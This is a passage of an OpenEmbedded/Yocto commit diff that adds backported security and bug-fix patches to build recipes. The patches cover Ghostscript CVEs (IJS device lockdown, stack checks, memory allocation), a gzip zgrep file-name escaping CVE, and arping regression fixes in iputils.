14 | CVE: CVE-2023-36664 #Dependency Patch1 | ||
15 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
16 | --- | ||
17 | base/gpmisc.c | 8 ++++---- | ||
18 | 1 file changed, 4 insertions(+), 4 deletions(-) | ||
19 | |||
20 | diff --git a/base/gpmisc.c b/base/gpmisc.c | ||
21 | index 34cd71f..c4fffae 100644 | ||
22 | --- a/base/gpmisc.c | ||
23 | +++ b/base/gpmisc.c | ||
24 | @@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf) | ||
25 | |||
26 | gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname) | ||
27 | { | ||
28 | - gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file"); | ||
29 | + gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file"); | ||
30 | if (file == NULL) | ||
31 | return NULL; | ||
32 | |||
33 | @@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t | ||
34 | memset(((char *)file)+sizeof(*prototype), | ||
35 | 0, | ||
36 | size - sizeof(*prototype)); | ||
37 | - file->memory = mem->non_gc_memory; | ||
38 | + file->memory = mem->thread_safe_memory; | ||
39 | |||
40 | return file; | ||
41 | } | ||
42 | @@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem, | ||
43 | prefix_len = 0; | ||
44 | } | ||
45 | rlen = len+1; | ||
46 | - bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path"); | ||
47 | + bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path"); | ||
48 | if (bufferfull == NULL) | ||
49 | return gs_error_VMerror; | ||
50 | |||
51 | @@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem, | ||
52 | break; | ||
53 | } | ||
54 | |||
55 | - gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path"); | ||
56 | + gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path"); | ||
57 | #ifdef EACCES | ||
58 | if (code == gs_error_invalidfileaccess) | ||
59 | errno = EACCES; | ||
60 | -- | ||
61 | 2.25.1 | ||
62 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch new file mode 100644 index 0000000000..3acb8a503c --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch | |||
@@ -0,0 +1,62 @@ | |||
1 | From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001 | ||
2 | From: Ken Sharp <ken.sharp@artifex.com> | ||
3 | Date: Thu, 24 Aug 2023 15:24:35 +0100 | ||
4 | Subject: [PATCH] IJS device - try and secure the IJS server startup | ||
5 | |||
6 | Bug #707051 ""ijs" device can execute arbitrary commands" | ||
7 | |||
8 | The problem is that the 'IJS' device needs to start the IJS server, and | ||
9 | that is indeed an arbitrary command line. There is (apparently) no way | ||
10 | to validate it. Indeed, this is covered quite clearly in the comments | ||
11 | at the start of the source: | ||
12 | |||
13 | * WARNING: The ijs server can be selected on the gs command line | ||
14 | * which is a security risk, since any program can be run. | ||
15 | |||
16 | Previously this used the awful LockSafetyParams hackery, which we | ||
17 | abandoned some time ago because it simply couldn't be made secure (it | ||
18 | was implemented in PostScript and was therefore vulnerable to PostScript | ||
19 | programs). | ||
20 | |||
21 | This commit prevents PostScript programs switching to the IJS device | ||
22 | after SAFER has been activated, and prevents changes to the IjsServer | ||
23 | parameter after SAFER has been activated. | ||
24 | |||
25 | SAFER is activated, unless explicitly disabled, before any user | ||
26 | PostScript is executed which means that the device and the server | ||
27 | invocation can only be configured on the command line. This does at | ||
28 | least provide minimal security against malicious PostScript programs. | ||
29 | |||
30 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5] | ||
31 | CVE: CVE-2023-43115 | ||
32 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
33 | --- | ||
34 | devices/gdevijs.c | 5 ++++- | ||
35 | 1 file changed, 4 insertions(+), 1 deletion(-) | ||
36 | |||
37 | diff --git a/devices/gdevijs.c b/devices/gdevijs.c | ||
38 | index 3d337c5..e50d69f 100644 | ||
39 | --- a/devices/gdevijs.c | ||
40 | +++ b/devices/gdevijs.c | ||
41 | @@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev) | ||
42 | static const char rgb[] = "DeviceRGB"; | ||
43 | gx_device_ijs *ijsdev = (gx_device_ijs *)dev; | ||
44 | |||
45 | + if (ijsdev->memory->gs_lib_ctx->core->path_control_active) | ||
46 | + return_error(gs_error_invalidaccess); | ||
47 | + | ||
48 | code = gx_default_finish_copydevice(dev, from_dev); | ||
49 | if(code < 0) | ||
50 | return code; | ||
51 | @@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist) | ||
52 | if (code >= 0) | ||
53 | code = gsijs_read_string(plist, "IjsServer", | ||
54 | ijsdev->IjsServer, sizeof(ijsdev->IjsServer), | ||
55 | - dev->LockSafetyParams, is_open); | ||
56 | + ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open); | ||
57 | |||
58 | if (code >= 0) | ||
59 | code = gsijs_read_string_malloc(plist, "DeviceManufacturer", | ||
60 | -- | ||
61 | 2.25.1 | ||
62 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch new file mode 100644 index 0000000000..77eec7d158 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch | |||
@@ -0,0 +1,51 @@ | |||
1 | From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Fri, 12 Feb 2021 10:34:23 +0000 | ||
4 | Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation. | ||
5 | |||
6 | During function result sampling, after the callout to the Postscript | ||
7 | interpreter, make sure there is enough stack space available before pushing | ||
8 | or popping entries. | ||
9 | |||
10 | In thise case, the Postscript procedure for the "function" is totally invalid | ||
11 | (as a function), and leaves the op stack in an unrecoverable state (as far as | ||
12 | function evaluation is concerned). We end up popping more entries off the | ||
13 | stack than are available. | ||
14 | |||
15 | To cope, add in stack limit checking to throw an appropriate error when this | ||
16 | happens. | ||
17 | CVE: CVE-2021-45944 | ||
18 | Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25] | ||
19 | Signed-off-by: Minjae Kim <flowergom@gmail.com> | ||
20 | --- | ||
21 | psi/zfsample.c | 14 +++++++++++--- | ||
22 | 1 file changed, 11 insertions(+), 3 deletions(-) | ||
23 | |||
24 | diff --git a/psi/zfsample.c b/psi/zfsample.c | ||
25 | index 290809405..652ae02c6 100644 | ||
26 | --- a/psi/zfsample.c | ||
27 | +++ b/psi/zfsample.c | ||
28 | @@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p) | ||
29 | } else { | ||
30 | if (stack_depth_adjust) { | ||
31 | stack_depth_adjust -= num_out; | ||
32 | - push(O_STACK_PAD - stack_depth_adjust); | ||
33 | - for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) | ||
34 | - make_null(op - i); | ||
35 | + if ((O_STACK_PAD - stack_depth_adjust) < 0) { | ||
36 | + stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust); | ||
37 | + check_op(stack_depth_adjust); | ||
38 | + pop(stack_depth_adjust); | ||
39 | + } | ||
40 | + else { | ||
41 | + check_ostack(O_STACK_PAD - stack_depth_adjust); | ||
42 | + push(O_STACK_PAD - stack_depth_adjust); | ||
43 | + for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) | ||
44 | + make_null(op - i); | ||
45 | + } | ||
46 | } | ||
47 | } | ||
48 | |||
49 | -- | ||
50 | 2.25.1 | ||
51 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb index 65135f5821..e57f592892 100644 --- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb +++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb | |||
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native" | |||
19 | UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases" | 19 | UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases" |
20 | UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar" | 20 | UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar" |
21 | 21 | ||
22 | # The jpeg issue in the CVE is present in the gs jpeg sources | ||
23 | # however we use an external jpeg which doesn't have the issue. | ||
24 | CVE_CHECK_WHITELIST += "CVE-2013-6629" | ||
25 | |||
22 | def gs_verdir(v): | 26 | def gs_verdir(v): |
23 | return "".join(v.split(".")) | 27 | return "".join(v.split(".")) |
24 | 28 | ||
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d | |||
29 | file://do-not-check-local-libpng-source.patch \ | 33 | file://do-not-check-local-libpng-source.patch \ |
30 | file://avoid-host-contamination.patch \ | 34 | file://avoid-host-contamination.patch \ |
31 | file://mkdir-p.patch \ | 35 | file://mkdir-p.patch \ |
36 | file://CVE-2020-15900.patch \ | ||
37 | file://check-stack-limits-after-function-evalution.patch \ | ||
38 | file://CVE-2021-45949.patch \ | ||
39 | file://CVE-2021-3781_1.patch \ | ||
40 | file://CVE-2021-3781_2.patch \ | ||
41 | file://CVE-2021-3781_3.patch \ | ||
42 | file://CVE-2023-28879.patch \ | ||
43 | file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \ | ||
44 | file://CVE-2023-36664-pre1.patch \ | ||
45 | file://CVE-2023-36664-1.patch \ | ||
46 | file://CVE-2023-36664-2.patch \ | ||
47 | file://CVE-2023-43115.patch \ | ||
48 | file://CVE-2020-36773.patch \ | ||
32 | " | 49 | " |
33 | 50 | ||
34 | SRC_URI = "${SRC_URI_BASE} \ | 51 | SRC_URI = "${SRC_URI_BASE} \ |
35 | file://ghostscript-9.21-prevent_recompiling.patch \ | 52 | file://ghostscript-9.21-prevent_recompiling.patch \ |
36 | file://cups-no-gcrypt.patch \ | 53 | file://cups-no-gcrypt.patch \ |
37 | file://CVE-2020-15900.patch \ | ||
38 | " | 54 | " |
39 | 55 | ||
40 | SRC_URI_class-native = "${SRC_URI_BASE} \ | 56 | SRC_URI_class-native = "${SRC_URI_BASE} \ |
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb index ab70ea98a3..7d0f74186e 100644 --- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb +++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb | |||
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/" | |||
5 | LICENSE = "MIT" | 5 | LICENSE = "MIT" |
6 | LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" | 6 | LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" |
7 | 7 | ||
8 | SRC_URI = "git://${GO_IMPORT}" | 8 | SRC_URI = "git://${GO_IMPORT};branch=master" |
9 | SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" | 9 | SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" |
10 | UPSTREAM_CHECK_COMMITS = "1" | 10 | UPSTREAM_CHECK_COMMITS = "1" |
11 | 11 | ||
diff --git a/meta/recipes-extended/grep/grep_3.4.bb b/meta/recipes-extended/grep/grep_3.4.bb index e176dd727b..46ac4cfb00 100644 --- a/meta/recipes-extended/grep/grep_3.4.bb +++ b/meta/recipes-extended/grep/grep_3.4.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "GNU grep utility" | 1 | SUMMARY = "GNU grep utility" |
2 | HOMEPAGE = "http://savannah.gnu.org/projects/grep/" | 2 | HOMEPAGE = "http://savannah.gnu.org/projects/grep/" |
3 | DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines." | ||
3 | BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep" | 4 | BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep" |
4 | SECTION = "console/utils" | 5 | SECTION = "console/utils" |
5 | LICENSE = "GPLv3" | 6 | LICENSE = "GPLv3" |
diff --git a/meta/recipes-extended/groff/groff_1.22.4.bb b/meta/recipes-extended/groff/groff_1.22.4.bb index 7bb393e09c..f0e9eb6a8a 100644 --- a/meta/recipes-extended/groff/groff_1.22.4.bb +++ b/meta/recipes-extended/groff/groff_1.22.4.bb | |||
@@ -20,7 +20,6 @@ SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1b | |||
20 | 20 | ||
21 | # Remove at the next upgrade | 21 | # Remove at the next upgrade |
22 | PR = "r1" | 22 | PR = "r1" |
23 | HASHEQUIV_HASH_VERSION .= ".1" | ||
24 | 23 | ||
25 | DEPENDS = "bison-native" | 24 | DEPENDS = "bison-native" |
26 | RDEPENDS_${PN} += "perl sed" | 25 | RDEPENDS_${PN} += "perl sed" |
@@ -63,6 +62,10 @@ do_install_append() { | |||
63 | rm -rf ${D}${bindir}/glilypond | 62 | rm -rf ${D}${bindir}/glilypond |
64 | rm -rf ${D}${libdir}/groff/glilypond | 63 | rm -rf ${D}${libdir}/groff/glilypond |
65 | rm -rf ${D}${mandir}/man1/glilypond* | 64 | rm -rf ${D}${mandir}/man1/glilypond* |
65 | |||
66 | # not ship /usr/bin/grap2graph and its releated man files | ||
67 | rm -rf ${D}${bindir}/grap2graph | ||
68 | rm -rf ${D}${mandir}/man1/grap2graph* | ||
66 | } | 69 | } |
67 | 70 | ||
68 | do_install_append_class-native() { | 71 | do_install_append_class-native() { |
diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch new file mode 100644 index 0000000000..046c95df47 --- /dev/null +++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch | |||
@@ -0,0 +1,45 @@ | |||
1 | From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001 | ||
2 | From: Lasse Collin <lasse.collin@tukaani.org> | ||
3 | Date: Mon, 4 Apr 2022 23:52:49 -0700 | ||
4 | Subject: [PATCH] zgrep: avoid exploit via multi-newline file names | ||
5 | |||
6 | * zgrep.in: The issue with the old code is that with multiple | ||
7 | newlines, the N-command will read the second line of input, | ||
8 | then the s-commands will be skipped because it's not the end | ||
9 | of the file yet, then a new sed cycle starts and the pattern | ||
10 | space is printed and emptied. So only the last line or two get | ||
11 | escaped. This patch makes sed read all lines into the pattern | ||
12 | space and then do the escaping. | ||
13 | |||
14 | This vulnerability was discovered by: | ||
15 | cleemy desu wayo working with Trend Micro Zero Day Initiative | ||
16 | |||
17 | Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c] | ||
18 | CVE: CVE-2022-1271 | ||
19 | |||
20 | Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org> | ||
21 | --- | ||
22 | zgrep.in | 10 +++++++--- | ||
23 | 1 file changed, 7 insertions(+), 3 deletions(-) | ||
24 | |||
25 | diff --git a/zgrep.in b/zgrep.in | ||
26 | index 3efdb52..d391291 100644 | ||
27 | --- a/zgrep.in | ||
28 | +++ b/zgrep.in | ||
29 | @@ -222,9 +222,13 @@ do | ||
30 | '* | *'&'* | *'\'* | *'|'*) | ||
31 | i=$(printf '%s\n' "$i" | | ||
32 | sed ' | ||
33 | - $!N | ||
34 | - $s/[&\|]/\\&/g | ||
35 | - $s/\n/\\n/g | ||
36 | + :start | ||
37 | + $!{ | ||
38 | + N | ||
39 | + b start | ||
40 | + } | ||
41 | + s/[&\|]/\\&/g | ||
42 | + s/\n/\\n/g | ||
43 | ');; | ||
44 | esac | ||
45 | sed_script="s|^|$i:|" | ||
diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb index 9778e687e1..c558c21f10 100644 --- a/meta/recipes-extended/gzip/gzip_1.10.bb +++ b/meta/recipes-extended/gzip/gzip_1.10.bb | |||
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+" | |||
4 | 4 | ||
5 | SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \ | 5 | SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \ |
6 | file://run-ptest \ | 6 | file://run-ptest \ |
7 | file://CVE-2022-1271.patch \ | ||
7 | " | 8 | " |
8 | SRC_URI_append_class-target = " file://wrong-path-fix.patch" | 9 | SRC_URI_append_class-target = " file://wrong-path-fix.patch" |
9 | 10 | ||
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch new file mode 100644 index 0000000000..bf86115843 --- /dev/null +++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch | |||
@@ -0,0 +1,79 @@ | |||
1 | From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001 | ||
2 | From: lac-0073 <61903197+lac-0073@users.noreply.github.com> | ||
3 | Date: Mon, 26 Oct 2020 09:45:42 +0800 | ||
4 | Subject: [PATCH] arpping: make update neighbours work again | ||
5 | |||
6 | The arping is using inconsistent sender_ip_addr and target_ip_addr in | ||
7 | messages. This causes the client receiving the arp message not to update | ||
8 | the arp table entries. | ||
9 | |||
10 | The specific performance is as follows: | ||
11 | |||
12 | There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the | ||
13 | same IP subnet as eth0. This IP was originally used on another machine 1, | ||
14 | and th IP needs to be changed back to the machine 1. When using the arping | ||
15 | command to announce what ethernet address has IP 10.20.30.3, the arp table | ||
16 | on machine 3 is not updated. | ||
17 | |||
18 | Machine 3 original arp table: | ||
19 | |||
20 | 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 | ||
21 | 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 | ||
22 | 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 | ||
23 | |||
24 | Create interface eth0:0 on machine 1, and use the arping command to send arp | ||
25 | packets. Expected outcome on machine 3: | ||
26 | |||
27 | 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01 | ||
28 | 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 | ||
29 | 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 | ||
30 | |||
31 | Actual results on machine 3: | ||
32 | |||
33 | 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 | ||
34 | 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 | ||
35 | 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 | ||
36 | |||
37 | Fixes: https://github.com/iputils/iputils/issues/298 | ||
38 | Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339 | ||
39 | Signed-off-by: Aichun Li <liaichun@huawei.com> | ||
40 | Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098] | ||
41 | Signed-off-by: Visa Hankala <visa@hankala.org> | ||
42 | --- | ||
43 | arping.c | 16 +++++++++------- | ||
44 | 1 file changed, 9 insertions(+), 7 deletions(-) | ||
45 | |||
46 | diff --git a/arping.c b/arping.c | ||
47 | index a002786..53fdbb4 100644 | ||
48 | --- a/arping.c | ||
49 | +++ b/arping.c | ||
50 | @@ -968,7 +968,7 @@ int main(int argc, char **argv) | ||
51 | } | ||
52 | memset(&saddr, 0, sizeof(saddr)); | ||
53 | saddr.sin_family = AF_INET; | ||
54 | - if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) { | ||
55 | + if (ctl.source || ctl.gsrc.s_addr) { | ||
56 | saddr.sin_addr = ctl.gsrc; | ||
57 | if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) | ||
58 | error(2, errno, "bind"); | ||
59 | @@ -979,12 +979,14 @@ int main(int argc, char **argv) | ||
60 | saddr.sin_port = htons(1025); | ||
61 | saddr.sin_addr = ctl.gdst; | ||
62 | |||
63 | - if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) | ||
64 | - error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); | ||
65 | - if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) | ||
66 | - error(2, errno, "connect"); | ||
67 | - if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) | ||
68 | - error(2, errno, "getsockname"); | ||
69 | + if (!ctl.unsolicited) { | ||
70 | + if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) | ||
71 | + error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); | ||
72 | + if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) | ||
73 | + error(2, errno, "connect"); | ||
74 | + if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) | ||
75 | + error(2, errno, "getsockname"); | ||
76 | + } | ||
77 | ctl.gsrc = saddr.sin_addr; | ||
78 | } | ||
79 | close(probe_fd); | ||
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch new file mode 100644 index 0000000000..8495178879 --- /dev/null +++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch | |||
@@ -0,0 +1,39 @@ | |||
1 | From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001 | ||
2 | From: Sami Kerola <kerolasa@iki.fi> | ||
3 | Date: Wed, 31 Jul 2019 21:28:12 +0100 | ||
4 | Subject: [PATCH] arping: revert partially - fix sent vs received packages | ||
5 | return value | ||
6 | |||
7 | Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused regression. The | ||
8 | arping -D needs return value evaluation that was the earlier default, in | ||
9 | other cases the new return value should be correct. | ||
10 | |||
11 | Addresses: https://github.com/iputils/iputils/issues/209 | ||
12 | See-also: https://github.com/void-linux/void-packages/issues/13304 | ||
13 | Signed-off-by: Sami Kerola <kerolasa@iki.fi> | ||
14 | Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd] | ||
15 | Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com> | ||
16 | --- | ||
17 | arping.c | 6 +++++- | ||
18 | 1 file changed, 5 insertions(+), 1 deletion(-) | ||
19 | |||
20 | diff --git a/arping.c b/arping.c | ||
21 | index 77c9c56..2c87c15 100644 | ||
22 | --- a/arping.c | ||
23 | +++ b/arping.c | ||
24 | @@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl) | ||
25 | close(tfd); | ||
26 | freeifaddrs(ctl->ifa0); | ||
27 | rc |= finish(ctl); | ||
28 | - rc |= (ctl->sent != ctl->received); | ||
29 | + if (ctl->dad && ctl->quit_on_reply) | ||
30 | + /* Duplicate address detection mode return value */ | ||
31 | + rc |= !(ctl->brd_sent != ctl->received); | ||
32 | + else | ||
33 | + rc |= (ctl->sent != ctl->received); | ||
34 | return rc; | ||
35 | } | ||
36 | |||
37 | -- | ||
38 | 2.18.4 | ||
39 | |||
diff --git a/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch new file mode 100644 index 0000000000..a5f40860dc --- /dev/null +++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch | |||
@@ -0,0 +1,39 @@ | |||
1 | From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001 | ||
2 | From: Sami Kerola <kerolasa@iki.fi> | ||
3 | Date: Wed, 28 Aug 2019 20:05:22 +0100 | ||
4 | Subject: [PATCH] arping: fix -f quit on first reply regression | ||
5 | |||
6 | When arping runs together with -f 'quit on first reply' and -w <timeout> | ||
7 | 'how long to wait for a reply' the command needs to exit if replies are not | ||
8 | received after wait period. Notice that the exit in case of lost packages | ||
9 | will be 1 signifying failure. Getting a reply results to 0 exit value. | ||
10 | |||
11 | Addresses: https://bugs.debian.org/935946 | ||
12 | Reported-by: Lucas Nussbaum <lucas@debian.org> | ||
13 | Addresses: https://github.com/iputils/iputils/issues/211 | ||
14 | Reported-by: Noah Meyerhans <noahm@debian.org> | ||
15 | Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f | ||
16 | Signed-off-by: Sami Kerola <kerolasa@iki.fi> | ||
17 | Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff] | ||
18 | Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com> | ||
19 | --- | ||
20 | arping.c | 3 ++- | ||
21 | 1 file changed, 2 insertions(+), 1 deletion(-) | ||
22 | |||
23 | diff --git a/arping.c b/arping.c | ||
24 | index 2c87c15..30884f6 100644 | ||
25 | --- a/arping.c | ||
26 | +++ b/arping.c | ||
27 | @@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl) | ||
28 | continue; | ||
29 | } | ||
30 | total_expires += exp; | ||
31 | - if (0 < ctl->count && (uint64_t)ctl->count < total_expires) { | ||
32 | + if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) || | ||
33 | + (ctl->quit_on_reply && ctl->timeout < total_expires)) { | ||
34 | exit_loop = 1; | ||
35 | continue; | ||
36 | } | ||
37 | -- | ||
38 | 2.18.4 | ||
39 | |||
diff --git a/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch new file mode 100644 index 0000000000..ebd122c157 --- /dev/null +++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch | |||
@@ -0,0 +1,37 @@ | |||
1 | From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001 | ||
2 | From: Petr Vorel <petr.vorel@gmail.com> | ||
3 | Date: Sat, 7 Sep 2019 06:07:19 +0200 | ||
4 | Subject: [PATCH] arping: Fix comparison of different signedness warning | ||
5 | MIME-Version: 1.0 | ||
6 | Content-Type: text/plain; charset=UTF-8 | ||
7 | Content-Transfer-Encoding: 8bit | ||
8 | |||
9 | ../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare] | ||
10 | 768 | (ctl->quit_on_reply && ctl->timeout < total_expires)) { | ||
11 | |||
12 | Fixes: 1df5350 ("arping: fix -f quit on first reply regression") | ||
13 | Reference: https://github.com/iputils/iputils/pull/212 | ||
14 | Acked-by: Sami Kerola <kerolasa@iki.fi> | ||
15 | Signed-off-by: Petr Vorel <petr.vorel@gmail.com> | ||
16 | Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2] | ||
17 | Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com> | ||
18 | --- | ||
19 | arping.c | 2 +- | ||
20 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
21 | |||
22 | diff --git a/arping.c b/arping.c | ||
23 | index 2d05728..88319cd 100644 | ||
24 | --- a/arping.c | ||
25 | +++ b/arping.c | ||
26 | @@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl) | ||
27 | } | ||
28 | total_expires += exp; | ||
29 | if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) || | ||
30 | - (ctl->quit_on_reply && ctl->timeout < total_expires)) { | ||
31 | + (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) { | ||
32 | exit_loop = 1; | ||
33 | continue; | ||
34 | } | ||
35 | -- | ||
36 | 2.18.4 | ||
37 | |||
diff --git a/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch new file mode 100644 index 0000000000..923e06e30b --- /dev/null +++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch | |||
@@ -0,0 +1,45 @@ | |||
1 | From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001 | ||
2 | From: Sami Kerola <kerolasa@iki.fi> | ||
